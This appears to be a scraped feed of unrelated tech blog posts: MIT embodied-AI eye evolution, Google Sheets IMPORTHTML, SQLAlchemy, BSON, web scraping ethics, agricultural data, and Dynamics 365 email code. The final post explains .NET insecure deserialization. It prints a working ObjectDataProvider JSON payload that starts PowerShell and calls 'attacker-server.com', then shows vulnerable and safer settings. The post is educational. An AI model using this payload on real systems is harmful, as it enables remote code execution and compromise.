Instead of waiting millions of years, this project puts embodied AI agents — digital creatures inside simulated physics environments — through artificial evolution. They start with a basic light-sensing cell and, over many generations, their visual systems and behaviors evolve in response to survival challenges. The key idea is to let vision emerge naturally from interaction with the environment rather than being manually designed with fixed datasets or human bias. (eyes.mit.edu)

Different Tasks Lead to Different Eyes

The researchers posed “what-if” scenarios by assigning specific tasks to these agents:

  • Navigation tasks, like moving through a maze, favor eyes that cover a wide field with many simple sensors — similar to compound eyes seen in insects.

  • Detection tasks, such as distinguishing food from poison, drive the evolution of high-resolution, camera-like eyes with a focused forward gaze. (eyes.mit.edu)

This shows that the function of vision directly influences the type of visual system that evolves. (eyes.mit.edu)

Optics Emerge Naturally

One of the most fascinating outcomes is how optical features like lenses emerge in the simulations. When the artificial evolutionary system was allowed to evolve optical genes, it developed lens-like structures — not because they were programmed in, but because they offered a functional advantage. Lenses helped agents overcome the basic trade-off between collecting enough light and maintaining detailed spatial vision. (eyes.mit.edu)

Scaling Brains and Vision Together

The research also found that simply increasing the size of an agent’s “brain” didn’t always make it better at visual tasks. Improvements came only when neural processing and visual acuity scaled together — revealing a close link between sensory input quality and cognitive processing capacity. (eyes.mit.edu)

Beyond Biology — Designing Better Vision Systems

This computational approach doesn’t just help us understand how natural vision might have evolved differently; it also points toward new ways to design artificial vision systems. By treating embodied AI as a “hypothesis-testing machine,” the project lays the foundation for creating bio-inspired sensors and cameras that are optimized for specific tasks, from robotics and drones to wearable devices. (eyes.mit.edu)

How to Import Wikipedia Tables into Google Sheets Using IMPORTHTML

Google Sheets offers a powerful yet simple way to import data directly from the web. One of the most useful functions for this purpose is IMPORTHTML, which allows you to extract tables and lists from web pages such as Wikipedia. In this article, we’ll look at how to use this function step by step, with a practical example.

What Is the IMPORTHTML Function?

The IMPORTHTML function in Google Sheets lets you pull structured data from a webpage and display it automatically in your spreadsheet. This is especially helpful when working with public datasets, statistics, or frequently updated information.

The basic syntax is:

=IMPORTHTML("URL", "table", index)
  • URL – The web page you want to extract data from

  • "table" or "list" – The type of data you want to import

  • index – The number of the table or list on that page

Example: Importing Demographic Data from Wikipedia

Let’s say you want to import demographic data from Wikipedia into Google Sheets. For example, data from the Demographics of India page.

You can use the following formula:

=IMPORTHTML("http://en.wikipedia.org/wiki/Demographics_of_India", "table", 4)

This formula tells Google Sheets to:

  • Visit the Wikipedia page

  • Look for tables on the page

  • Import the fourth table it finds

Once you press Enter, Google Sheets will automatically load the data into your spreadsheet.

Why Use IMPORTHTML?

Here are a few key benefits:

  • Automatic updates – When the source page changes, your data updates too

  • No manual copy-paste – Saves time and reduces errors

  • Perfect for analysis – Ideal for charts, reports, and dashboards

  • Beginner-friendly – No coding skills required

Tips for Better Results

  • If the imported table isn’t the one you want, try changing the index number

  • Make sure the webpage is public and not blocked

  • Use additional Google Sheets functions (like QUERY, FILTER, or SORT) to clean and analyze the imported data

The IMPORTHTML function is an excellent tool for bloggers, researchers, students, and analysts who want to work with live web data. With just one formula, you can transform publicly available information into a dynamic and useful spreadsheet.

SQLAlchemy Data wrangling

When working with data, especially at scale, spreadsheets can quickly reach their limits. This is where databases come in.

A database is an organized collection of structured data designed to make data storage, retrieval, modification, and deletion efficient and reliable. Databases are a foundational tool in data analysis, data engineering, and software development.

Why use databases for data wrangling?

Databases offer several key advantages when handling data. They are fast and optimized for performance, even when working with large datasets. They provide administrative features such as access controls, which help protect sensitive information. They also enforce data integrity rules, ensuring that data is entered in the correct format, which is essential for reliable data wrangling.

Types of databases

Databases generally fall into two main categories: relational and non-relational. Relational databases are the most popular and widely used.

Relational databases organize data into tables made up of rows and columns, similar to Excel spreadsheets, but with stricter rules. Each column must have a unique name, all values in a column must share the same data type, and using clear, descriptive column names is considered best practice.

Common examples of relational databases include SQLite, PostgreSQL, MySQL, and SQL Server.

Non-relational databases, often referred to as NoSQL databases, are designed for more flexible or unstructured data, such as documents or key-value pairs. While powerful, they are outside the scope of this introduction.

What is SQL?

SQL, or Structured Query Language, is the standard language used to interact with relational databases. SQL allows users to read, manipulate, and modify data efficiently.

Some common SQL commands include CREATE TABLE, which creates a new table in a database; DROP TABLE, which removes a table; SELECT, which retrieves data matching specific conditions and forms the basis of a query; and FROM, which specifies the table from which the data should be retrieved.

Using SQL with Python

In Python, libraries such as SQLAlchemy make it easy to work with databases. SQLAlchemy allows you to connect to a database, execute SQL queries, load the results into a pandas DataFrame, and store processed data back into the database.

This creates a powerful workflow that combines the speed and reliability of SQL with the simplicity and flexibility of pandas.
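
A minimal sketch of that workflow, assuming a local SQLite file and a hypothetical customers table:

import pandas as pd
from sqlalchemy import create_engine

# Connect to a local SQLite database (the file path is just an example)
engine = create_engine("sqlite:///data.db")

# Run a SQL query and load the result into a DataFrame
df = pd.read_sql("SELECT * FROM customers WHERE country = 'IT'", engine)

# ... clean / transform with pandas ...

# Write the processed data back to a new table
df.to_sql("customers_clean", engine, if_exists="replace", index=False)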

Important things to remember

It is possible to work directly with databases using tools like sqlite3 without SQLAlchemy. SQLAlchemy also supports many database systems beyond SQLite, including PostgreSQL.

Finally, data wrangling does not always have to be done in pandas. In many professional environments, data cleaning and transformation are performed directly in SQL. The best tool often depends on company infrastructure, performance needs, and scalability requirements.

Understanding databases and SQL is a fundamental skill for anyone working with data. Even if pandas is your primary tool, knowing how databases work and how to query them effectively will make you a stronger and more versatile data professional.

BSON: The Binary Format Behind MongoDB

BSON (Binary JSON) is a binary serialization format designed to represent JSON-like data structures in a more efficient, extensible, and performance-oriented way. It is best known as the native data format used by MongoDB, one of the most popular NoSQL databases in the world.

What Is BSON?

BSON was created as an evolution of JSON. While JSON is simple, human-readable, and widely used in web applications, it has limitations when used for high-performance data storage and processing. BSON addresses these limitations by encoding JSON-like documents into a binary representation, while preserving a familiar structure.

In short, BSON is optimized for machine efficiency rather than human readability.

Key Features

BSON offers several important features:

  • Binary format: enables faster data parsing and traversal.

  • Extended data types: supports additional types such as Date, Binary, ObjectId, Decimal128, and embedded documents.

  • Self-describing structure: each element includes type and length information, making parsing efficient.

  • Support for complex data models: ideal for hierarchical and semi-structured data.

BSON and MongoDB

MongoDB uses BSON as its internal data storage format. This design allows the database to:

  • efficiently index document fields;

  • execute fast queries on nested and complex data;

  • handle large volumes of unstructured or semi-structured data.

When developers interact with MongoDB using JSON through APIs or drivers, the conversion to BSON happens automatically behind the scenes.
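
A small sketch of the round trip using the bson module that ships with PyMongo (bson.encode and bson.decode are available from PyMongo 3.9 onward):

import bson  # installed as part of the pymongo package
from datetime import datetime

document = {"name": "Alice", "created": datetime.utcnow(), "scores": [1, 2, 3]}

data = bson.encode(document)   # bytes, not human-readable
print(type(data), len(data))

decoded = bson.decode(data)    # back to a Python dict
print(decoded)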

JSON vs BSON

JSON                     BSON
Text-based               Binary
Human-readable           Not human-readable
Limited data types       Rich data types
Smaller in some cases    Faster to process

Although BSON documents can be larger in size than JSON equivalents, this trade-off is justified by improved performance and greater flexibility.

Advantages and Disadvantages

Advantages

  • High performance

  • Rich data typing

  • Well-suited for NoSQL databases

Disadvantages

  • Not directly readable by humans

  • More complex than JSON

  • Requires specific libraries to parse


BSON is a powerful and efficient data representation format designed for modern database systems. While it is rarely used directly by developers, it plays a critical role in enabling MongoDB’s performance, scalability, and flexibility. Understanding BSON provides valuable insight into how NoSQL databases manage and process data internally.


Web Scraping: What It Is, When to Use It, and Why to Do It Ethically

In the world of data, one of the most common challenges is accessing information. Very often, the data we need is not available in downloadable formats (such as CSV or Excel), but is instead embedded within web pages. This is where web scraping comes into play.

What Is Web Scraping?

Web scraping is a technique that allows you to extract data from websites using code. Web pages are written in HTML (HyperText Markup Language), a language that uses tags to structure content (headings, paragraphs, tables, links, etc.).

Since HTML is essentially text, it can be read and analyzed by programs called parsers, which make it possible to automatically locate and retrieve the desired information.

In practice, instead of manually copying and pasting data from a website, we can write a script that does it for us.

How Do You Obtain HTML Data?

HTML data can be collected in two main ways:

  • By manually downloading the HTML source code of a web page

  • By programmatically accessing the website via HTTP requests (for example, using a GET request)

Once the HTML is obtained, it can be analyzed and transformed into structured data ready for analysis.
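
As a minimal sketch of the programmatic route (the URL is a placeholder, and BeautifulSoup is just one of several possible parsers):

import requests
from bs4 import BeautifulSoup

# Fetch the page with a plain GET request
response = requests.get("https://example.com/page.html", timeout=10)
response.raise_for_status()

# Parse the HTML and pull out the pieces you need
soup = BeautifulSoup(response.text, "html.parser")
for heading in soup.find_all("h2"):
    print(heading.get_text(strip=True))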

When Not to Use Web Scraping

It’s important to clarify a crucial point: web scraping is not always allowed.

Many websites impose specific restrictions in their Terms and Conditions, and ignoring them can lead to legal issues. For this reason, it’s essential to do your homework before starting any scraping activity.

Here are some fundamental guidelines to follow:

  • Always check the website’s Terms and Conditions

  • Consider whether your data usage is personal, academic, or commercial

  • Act ethically and responsibly

  • If the website offers a public API, use it instead of scraping

  • Send HTTP requests at a reasonable frequency

  • Avoid massive or simultaneous requests that could resemble a DDoS attack

  • Stay informed about laws and regulations related to web scraping

Web scraping is not just a technical matter, but also an ethical one. There are excellent articles that explore this topic further, such as “Ethics in Web Scraping” on Towards Data Science.

API vs Web Scraping

Whenever possible, it’s always better to choose APIs over scraping.

Why?

  • APIs are more stable: they don’t depend on a website’s layout

  • They are specifically designed to provide data

  • They offer data that is already structured and easy to use

  • They scale better with increased request volume

Web scraping, on the other hand, is fragile: even a small change in the website’s HTML code (a redesign, a new tag, a different class) can completely break your script.

Golden rule: if an official API exists, use it.

Key Terms to Know

For beginners, here are some essential concepts:

  • HTML (HyperText Markup Language): the markup language used to create web pages

  • Parser: a tool that analyzes HTML code to extract information

  • Web Scraping: a technique for extracting data from websites using code


Web scraping is a powerful and highly useful tool for anyone working with data, but it must be used consciously and responsibly. Understanding how HTML works, when to use scraping, and when to avoid it is essential to becoming an effective—and above all ethical—data wrangler.

If you want to work with web data, remember: respect websites, respect the rules, and always choose the best solution between scraping and APIs.

How the Agricultural Sector Can Finally Tackle Its Data Problem


Agriculture is at a critical crossroads. With food security, climate change and farmer incomes all under pressure, digital innovation could be a game-changer. But there’s a big catch: agricultural data — while incredibly valuable — remains fragmented, inconsistent and hard to use. (World Economic Forum)

Why Data Matters More Than Ever

Emerging technologies like artificial intelligence, machine learning, drones and sensors have huge potential to transform agriculture — from better crop predictions to smarter resource use. But these technologies depend on data. Not just any data, but accurate, standardized and easily shareable data that AI and digital platforms can actually work with. (World Economic Forum)

The Big Challenges

The agricultural sector faces three core data issues:

1. Fragmentation
Data comes from many different sources — soil measurements, weather reports, satellite imagery, market prices and more — but it’s scattered across systems that don’t talk to each other. (World Economic Forum)

2. Lack of Standard Formats
There’s no common language or format for agricultural data. Different organizations collect data differently, which makes combining and analyzing it difficult. (World Economic Forum)

3. Poor Interchange Between Systems
Agriculture evolves quickly — crops grow, weather changes, pests spread. To respond in real time, farmers and platforms need dynamic data that can be shared instantly. Right now that’s not happening efficiently. (World Economic Forum)

A Path Forward: Common Data Standards

To unlock the full potential of digital agriculture, the sector needs a shared, open data format that can be used across tools and platforms. Standardizing data would help:

  • Build predictive models that give farmers tailored advice

  • Improve market access and supply chain planning

  • Enable new digital services and apps that boost productivity and efficiency (World Economic Forum)

Some existing efforts — like the United Nations’ AGROVOC agricultural vocabulary — are already useful, but what’s needed now is an industry-wide, interoperable data system. Using common tech standards (like JSON and GeoJSON) as building blocks can help create formats that work for both humans and machines. (World Economic Forum)

Why It Matters

A unified agricultural data system isn’t just a tech project — it’s a way to improve food security, increase farmer incomes, and fuel innovation across the entire value chain. When data flows freely (with proper safeguards and consent), everyone from smallholder farmers to global agribusinesses can benefit. (World Economic Forum).

Dynamic Email Placeholder Replacement – PreCreate Plugin Example

In Microsoft Dynamics 365 / Dataverse, email templates are often static and difficult to adapt to different business scenarios. A common requirement is to dynamically inject data such as:

  • Recipient names

  • Related record information

  • Conditional fields (shown only when data exists)

This article presents a PreCreate Email plugin that replaces placeholders inside the email body before the Email record is created, using clean and reusable logic.



Plugin Overview

Execution details

  • Entity: email

  • Message: Create

  • Stage: Pre-Operation (20)

  • Purpose: Replace placeholders in email.description

Supported placeholders

Placeholder                          Source
##ToRecipient##                      Names of recipients (To field)
##account.custom_taxcode##           Account custom field
##opportunity.custom_recordurl##     Opportunity record URL


Complete Plugin Code (Generic & Safe for Sharing)

using Microsoft.Xrm.Sdk;
using Microsoft.Xrm.Sdk.Query;
using System;
using System.Text.RegularExpressions;

namespace Plugins.Email
{
    public class PreCreateEmailReplacePlaceholders : IPlugin
    {
        public void Execute(IServiceProvider serviceProvider)
        {
            var tracing = (ITracingService)serviceProvider.GetService(typeof(ITracingService));
            var context = (IPluginExecutionContext)serviceProvider.GetService(typeof(IPluginExecutionContext));
            var factory = (IOrganizationServiceFactory)serviceProvider.GetService(typeof(IOrganizationServiceFactory));

            var serviceUser = factory.CreateOrganizationService(context.InitiatingUserId);
            var serviceAdmin = factory.CreateOrganizationService(null);

            if (context.Stage != 20 ||
                context.MessageName != "Create" ||
                context.PrimaryEntityName != "email")
            {
                throw new InvalidPluginExecutionException("Plugin not registered correctly.");
            }

            if (context.InputParameters.Contains("Target") &&
                context.InputParameters["Target"] is Entity target)
            {
                ExecuteLogic(serviceAdmin, serviceUser, target, tracing);
            }
        }

        private void ExecuteLogic(
            IOrganizationService serviceAdmin,
            IOrganizationService serviceUser,
            Entity target,
            ITracingService tracing)
        {
            tracing?.Trace("START PreCreateEmailReplacePlaceholders");

            try
            {
                if (!target.Contains("description"))
                    return;

                var description = target.GetAttributeValue<string>("description");

                #region TO RECIPIENTS

                if (target.Contains("to"))
                {
                    var parties = target.GetAttributeValue<EntityCollection>("to")?.Entities;
                    var recipientNames = string.Empty;

                    foreach (var party in parties)
                    {
                        if (!party.Contains("partyid")) continue;

                        var reference = party.GetAttributeValue<EntityReference>("partyid");
                        if (reference == null) continue;

                        string primaryName;

                        switch (reference.LogicalName)
                        {
                            case "account": primaryName = "name"; break;
                            case "contact": primaryName = "fullname"; break;
                            case "systemuser": primaryName = "fullname"; break;
                            case "queue": primaryName = "name"; break;
                            default: continue;
                        }

                        var entity = serviceAdmin.Retrieve(
                            reference.LogicalName,
                            reference.Id,
                            new ColumnSet(primaryName));

                        var name = entity.GetAttributeValue<string>(primaryName);

                        recipientNames = string.IsNullOrEmpty(recipientNames)
                            ? name
                            : $"{recipientNames}, {name}";
                    }

                    description = description.Replace("##ToRecipient##", recipientNames);
                }

                #endregion

                #region REGARDING RECORD

                if (target.Contains("regardingobjectid"))
                {
                    var regarding = target.GetAttributeValue<EntityReference>("regardingobjectid");

                    if (regarding != null)
                    {
                        switch (regarding.LogicalName)
                        {
                            case "opportunity":
                                var opportunity = serviceAdmin.Retrieve(
                                    "opportunity",
                                    regarding.Id,
                                    new ColumnSet("custom_recordurl"));

                                description = description.Replace(
                                    "##opportunity.custom_recordurl##",
                                    opportunity.GetAttributeValue<string>("custom_recordurl"));
                                break;

                            case "account":
                                var account = serviceAdmin.Retrieve(
                                    "account",
                                    regarding.Id,
                                    new ColumnSet("custom_taxcode"));

                                var pattern = @"<li\s*>\s*Tax Code:\s*##account\.custom_taxcode##\s*</li>";
                                var taxCode = account.GetAttributeValue<string>("custom_taxcode");

                                var replacement = !string.IsNullOrWhiteSpace(taxCode)
                                    ? $"<li>Tax Code: {taxCode}</li>"
                                    : string.Empty;

                                description = Regex.Replace(
                                    description,
                                    pattern,
                                    replacement,
                                    RegexOptions.IgnoreCase | RegexOptions.Singleline);
                                break;
                        }
                    }
                }

                #endregion

                target["description"] = description;
            }
            catch (Exception ex)
            {
                tracing?.Trace(ex.ToString());
                throw new InvalidPluginExecutionException(ex.Message, ex);
            }
            finally
            {
                tracing?.Trace("END PreCreateEmailReplacePlaceholders");
            }
        }
    }
}



Example Email Template (HTML)

<p>Dear <strong>##ToRecipient##</strong>,</p>

<p>
A new request has been created in the system.
</p>

<ul>
<li>Tax Code: ##account.custom_taxcode##</li>
</ul>

<p>
You can open the related opportunity here:
</p>

<p>
<a href="##opportunity.custom_recordurl##">Open Opportunity</a>
</p>

<p>
Kind regards,<br/>
CRM Team
</p>



How It Works

1. Recipient Resolution

Reads all records in the To field (activityparty)

Supports users, contacts, accounts, and queues

Joins names into a single string

Replaces ##ToRecipient##



2. Conditional HTML Replacement

For Account-related emails:

If the tax code exists → <li> is rendered

If empty → <li> is completely removed via Regex

This keeps the email HTML clean and professional.
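
To make the conditional replacement concrete, here is a minimal standalone sketch of the same Regex.Replace call used in the plugin (the tax code value and class name are invented for the example):

using System;
using System.Text.RegularExpressions;

class TaxCodePlaceholderDemo
{
    static void Main()
    {
        var pattern = @"<li\s*>\s*Tax Code:\s*##account\.custom_taxcode##\s*</li>";
        var body = "<ul><li>Tax Code: ##account.custom_taxcode##</li></ul>";

        // Tax code available: the placeholder is filled in and the <li> is kept
        Console.WriteLine(Regex.Replace(
            body, pattern, "<li>Tax Code: IT01234567890</li>",
            RegexOptions.IgnoreCase | RegexOptions.Singleline));
        // -> <ul><li>Tax Code: IT01234567890</li></ul>

        // Tax code missing: the whole <li> is removed from the email body
        Console.WriteLine(Regex.Replace(
            body, pattern, string.Empty,
            RegexOptions.IgnoreCase | RegexOptions.Singleline));
        // -> <ul></ul>
    }
}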



3. Why Pre-Operation?

Executing in the Pre-Operation stage of the Create message ensures:

Email body is already finalized when saved

No async jobs

No client-side JavaScript

Works with templates, workflows, Power Automate
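
In the Plugin Registration Tool, this corresponds to a step registered on the Create message of the email entity, at the Pre-Operation stage (20), running synchronously. These are exactly the conditions checked by the guard clause at the top of Execute.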

Sending Emails from Templates in Dynamics 365: A Real-World Client-Side Pattern

Sending emails from Microsoft Dynamics 365 / Dataverse using Email Templates is a very common requirement.

However, real-world scenarios are rarely simple:

  • Multiple TO and CC recipients

  • Mix of internal users and external email addresses

  • Recipients driven by configuration, not hardcoded values

  • The need to review the email before sending

This article presents a production-proven, client-side pattern to create an Email activity from a template, keeping the implementation practical, explicit, and readable.

The code shown below is based on real production logic. Names, entities, and addresses have been anonymized, but the structure and flow are intentionally unchanged.

Why Client-Side?

This approach is ideal when:

  • The action is triggered by a command bar button or form event

  • The user must see and optionally edit the email before sending

  • Email recipients depend on current form data

For fully automated emails, a server-side solution (plugin or Power Automate) may be more appropriate.

High-Level Flow

  1. Validate form state (no unsaved changes)

  2. Check mandatory business conditions

  3. Retrieve the Email Template by name

  4. Instantiate the template against the current record

  5. Load TO / CC addresses from configuration

  6. Resolve recipients to system users when possible

  7. Build Activity Parties (FROM / TO / CC)

  8. Create the Email activity

  9. Open the Email form for review

Recipient Resolution Strategy

One of the most important parts of the pattern is how recipients are handled.

For each configured email address:

  • If a matching systemuser.internalemailaddress exists → bind the user

  • Otherwise → use addressused

This guarantees that:

  • Internal users appear correctly in Dynamics

  • External recipients are still supported

  • The same logic works across environments

The pattern also supports:

  • Multiple TO recipients

  • Multiple CC recipients

  • Automatic inclusion of the current user

  • Optional inclusion of an administrator or supervisor

Activity Party Masks Recap



  • Sender (FROM) → participationtypemask = 1

  • Recipient (TO) → participationtypemask = 2

  • CC → participationtypemask = 3

  • BCC → participationtypemask = 4


Correct usage of these values is essential when creating Email activities programmatically.


Configuration-Driven Design

Instead of hardcoding email addresses, this pattern reads them from a configuration table.

Benefits:

  • No deployments required for recipient changes

  • Easy maintenance by administrators

  • Safer promotion across DEV / TEST / PROD

Each configuration record simply contains a semicolon-separated list of email addresses.
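
For illustration, a hypothetical configuration record (the entity and column names match the email_configuration table queried in the script below; the addresses are invented) might look like:

name: EMAIL_TO
value: sales.team@company.com;service.desk@company.com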

Error Handling and User Experience

The implementation intentionally:

  • Stops execution early when prerequisites are not met

  • Provides clear feedback to the user

  • Avoids partially created Email records

This makes the behavior predictable and user-friendly.

This pattern is not about writing the shortest possible JavaScript.
It is about writing explicit, maintainable, and production-ready code that:

  • Mirrors real business requirements

  • Is easy to debug

  • Can be reused across multiple entities and scenarios

If you work frequently with Dynamics 365 Email Templates, this approach provides a solid and battle-tested foundation. 
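
Complete Client-Side Code (Generic & Anonymized)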


GenericDocumentCheck: async function (formContext) {

    // =====================
    // 1. Guard clauses
    // =====================
    if (formContext.data.entity.getIsDirty()) {
        Xrm.Navigation.openAlertDialog({ text: "Please save the record before proceeding." });
        return;
    }

    formContext.ui.clearFormNotification("MissingMandatoryField");

    var mandatoryValue = formContext.getAttribute("custom_mandatoryfield")?.getValue();
    if ((!mandatoryValue || mandatoryValue === "") && formContext.ui.getFormType() !== 1) {
        formContext.ui.setFormNotification(
            "Mandatory field is missing.",
            "ERROR",
            "MissingMandatoryField"
        );
        return;
    }

    // =====================
    // 2. Template retrieval
    // =====================
    var recordId = formContext.data.entity.getId().replace(/[{}]/g, "");
    var emailTemplateName = "Generic Request Template";

    var templateFetch = "?fetchXml=" + encodeURIComponent(`
        <fetch top="1">
            <entity name="template">
                <attribute name="templateid" />
                <filter>
                    <condition attribute="title" operator="eq" value="${emailTemplateName}" />
                </filter>
            </entity>
        </fetch>
    `);

    var templateResult = await Xrm.WebApi.retrieveMultipleRecords("template", templateFetch);
    if (!templateResult.entities.length) {
        throw new Error("Email template not found: " + emailTemplateName);
    }

    var templateId = templateResult.entities[0].templateid;

    // =====================
    // 3. Instantiate template
    // =====================
    var instantiateRequest = {
        TemplateId: { guid: templateId },
        ObjectType: "account",
        ObjectId: { guid: recordId },
        getMetadata: function () {
            return {
                boundParameter: null,
                parameterTypes: {
                    TemplateId: { typeName: "Edm.Guid", structuralProperty: 1 },
                    ObjectType: { typeName: "Edm.String", structuralProperty: 1 },
                    ObjectId: { typeName: "Edm.Guid", structuralProperty: 1 }
                },
                operationType: 0,
                operationName: "InstantiateTemplate"
            };
        }
    };

    var response = await Xrm.WebApi.execute(instantiateRequest);
    if (!response.ok) {
        throw new Error("Error during InstantiateTemplate execution.");
    }

    var responseBody = await response.json();
    var emailSubject = responseBody.value[0].subject;
    var emailDescription = responseBody.value[0].description;

    // =====================
    // 4. Read email addresses from configuration
    // =====================
    var getAddressesByConfigName = async (name) => {
        var fetchXml = `<fetch>
            <entity name="email_configuration">
                <attribute name="value" />
                <filter>
                    <condition attribute="name" operator="eq" value="${name}" />
                </filter>
            </entity>
        </fetch>`;

        var result = await Xrm.WebApi.retrieveMultipleRecords(
            "email_configuration",
            "?fetchXml=" + encodeURIComponent(fetchXml)
        );

        if (result?.entities?.length > 0) {
            return result.entities[0].value.split(';');
        } else {
            throw new Error("Email configuration not found: " + name);
        }
    };

    var toAddresses = await getAddressesByConfigName("EMAIL_TO");
    var ccAddresses = await getAddressesByConfigName("EMAIL_CC");

    // =====================
    // 5. Build activity parties
    // =====================
    var activityParties = [];

    // ---------- FROM (Sender) ----------
    var fetchFromUser = "?fetchXml=" + encodeURIComponent(`
        <fetch top="1">
            <entity name="systemuser">
                <attribute name="systemuserid" />
                <filter>
                    <condition attribute="internalemailaddress" operator="eq"
                        value="noreply@company.com" />
                </filter>
            </entity>
        </fetch>
    `);

    var fromResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchFromUser);
    var senderUserId = fromResult.entities.length
        ? fromResult.entities[0].systemuserid
        : null;

    // Stop early with a clear message if the sender user cannot be resolved
    if (!senderUserId) {
        throw new Error("Sender user not found: noreply@company.com");
    }

    activityParties.push({
        participationtypemask: 1, // Sender (FROM)
        "partyid_systemuser@odata.bind": `/systemusers(${senderUserId})`
    });

    // ---------- TO (Recipients) ----------
    for (var i = 0; i < toAddresses.length; i++) {
        var toAddress = toAddresses[i];

        var fetchToUser = "?fetchXml=" + encodeURIComponent(`
            <fetch top="1">
                <entity name="systemuser">
                    <attribute name="systemuserid" />
                    <filter>
                        <condition attribute="internalemailaddress" operator="eq"
                            value="${toAddress}" />
                    </filter>
                </entity>
            </fetch>
        `);

        var toResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchToUser);
        var partyTo = { participationtypemask: 2 }; // Recipient (TO)

        if (toResult.entities.length) {
            partyTo["partyid_systemuser@odata.bind"] =
                `/systemusers(${toResult.entities[0].systemuserid})`;
        } else {
            partyTo["addressused"] = toAddress;
        }

        activityParties.push(partyTo);
    }

    // ---------- CC (Recipients) ----------
    for (var j = 0; j < ccAddresses.length; j++) {
        var ccAddress = ccAddresses[j];

        var fetchCcUser = "?fetchXml=" + encodeURIComponent(`
            <fetch top="1">
                <entity name="systemuser">
                    <attribute name="systemuserid" />
                    <filter>
                        <condition attribute="internalemailaddress" operator="eq"
                            value="${ccAddress}" />
                    </filter>
                </entity>
            </fetch>
        `);

        var ccResult = await Xrm.WebApi.retrieveMultipleRecords("systemuser", fetchCcUser);
        var partyCc = { participationtypemask: 3 }; // CC

        if (ccResult.entities.length) {
            partyCc["partyid_systemuser@odata.bind"] =
                `/systemusers(${ccResult.entities[0].systemuserid})`;
        } else {
            partyCc["addressused"] = ccAddress;
        }

        activityParties.push(partyCc);
    }

    // ---------- Current user in CC ----------
    var globalContext = Xrm.Utility.getGlobalContext();
    var currentUserId = globalContext.userSettings.userId.replace(/[{}]/g, "");

    activityParties.push({
        participationtypemask: 3, // CC
        "partyid_systemuser@odata.bind": `/systemusers(${currentUserId})`
    });

    // ---------- Optional admin user ----------
    var adminUserId = CustomUtility.getAdminUserId?.();
    if (adminUserId) {
        activityParties.push({
            participationtypemask: 3, // CC
            "partyid_systemuser@odata.bind": `/systemusers(${adminUserId})`
        });
    }

    // =====================
    // 6. Create email
    // =====================
    var email = {
        subject: emailSubject,
        description: emailDescription,
        "regardingobjectid_account@odata.bind": `/accounts(${recordId})`,
        email_activity_parties: activityParties
    };

    Xrm.WebApi.createRecord("email", email).then(
        function success(result) {
            Xrm.Navigation.openForm({
                entityName: "email",
                entityId: result.id
            });
        },
        function error(e) {
            console.error(e.message);
        }
    );
}


.NET insecure deserialization vulnerability

This attack is an example of a .NET insecure deserialization vulnerability that results in remote command execution using PowerShell. It occurs when an application deserializes untrusted JSON input and allows attackers to control which .NET objects are created during the process.

The attack begins when a vulnerable .NET application processes JSON data that includes type metadata such as the $type field. If the application does not restrict allowed types, the attacker can force the runtime to instantiate arbitrary .NET classes instead of simple data objects.

In this case, the attacker abuses the System.Windows.Data.ObjectDataProvider class. This class is commonly used in WPF applications for data binding, but it becomes dangerous during deserialization because it can automatically invoke methods as part of object initialization.

Through the crafted JSON payload, the attacker instructs the application to create an instance of System.Diagnostics.Process. This class is designed to start system processes and is not meant to be exposed to untrusted input. The payload specifies the method name Start, which causes the process to be executed automatically during deserialization.

When the Start method is invoked, the application launches PowerShell, a powerful command-line tool that is installed by default on Windows systems. Attackers frequently use PowerShell because it is trusted by the operating system and often allowed through security controls.

The PowerShell command includes Invoke-WebRequest, which sends an HTTP request to an attacker-controlled server. This outbound connection is typically used to confirm that the target system has been compromised, download additional malicious payloads, or retrieve further commands from a command-and-control server.

At this point, the attacker has achieved code execution with the same privileges as the vulnerable application. From here, they can escalate the attack by downloading malware, exfiltrating sensitive data, establishing persistence, or moving laterally across the network.

This attack works because the application treats deserialization as a safe data operation, while in reality it allows object creation and method execution. Without strict controls, deserialization becomes equivalent to executing attacker-supplied code.

The key lesson is that deserialization in .NET is not just about parsing data. If untrusted input is accepted and dangerous types are not restricted, it can directly lead to full system compromise. This makes insecure deserialization a critical security issue and a recurring entry in real-world attacks and vulnerability reports.


{
  "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName": "Start",
  "MethodParameters": {
    "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "$values": [
      "Cmd",
      "/c powershell -command \"Invoke-WebRequest -URI http://attacker-server.com\""
    ]
  },
  "ObjectInstance": {
    "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
  }
}


The command ultimately executed on the compromised host is:

powershell -command "Invoke-WebRequest -URI http://attacker-server.com"
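
For context, the whole attack hinges on a single deserialization call that honors the $type metadata. Below is a minimal sketch, assuming the application uses Json.NET (Newtonsoft.Json) with TypeNameHandling enabled; the article does not name the serializer, so treat this as an illustrative assumption. The safer variant leaves TypeNameHandling at its default and binds to a concrete DTO:

using Newtonsoft.Json;

public class RequestDto
{
    public string Name { get; set; }
}

public static class DeserializationExample
{
    public static void Handle(string untrustedJson)
    {
        // VULNERABLE: TypeNameHandling.All lets the payload's $type field decide
        // which .NET types are instantiated (ObjectDataProvider, Process, ...)
        var unsafeSettings = new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.All
        };
        var gadget = JsonConvert.DeserializeObject<object>(untrustedJson, unsafeSettings);

        // SAFER: the default (TypeNameHandling.None) ignores $type entirely,
        // and deserializing into a concrete DTO restricts what can be created
        var dto = JsonConvert.DeserializeObject<RequestDto>(untrustedJson);
    }
}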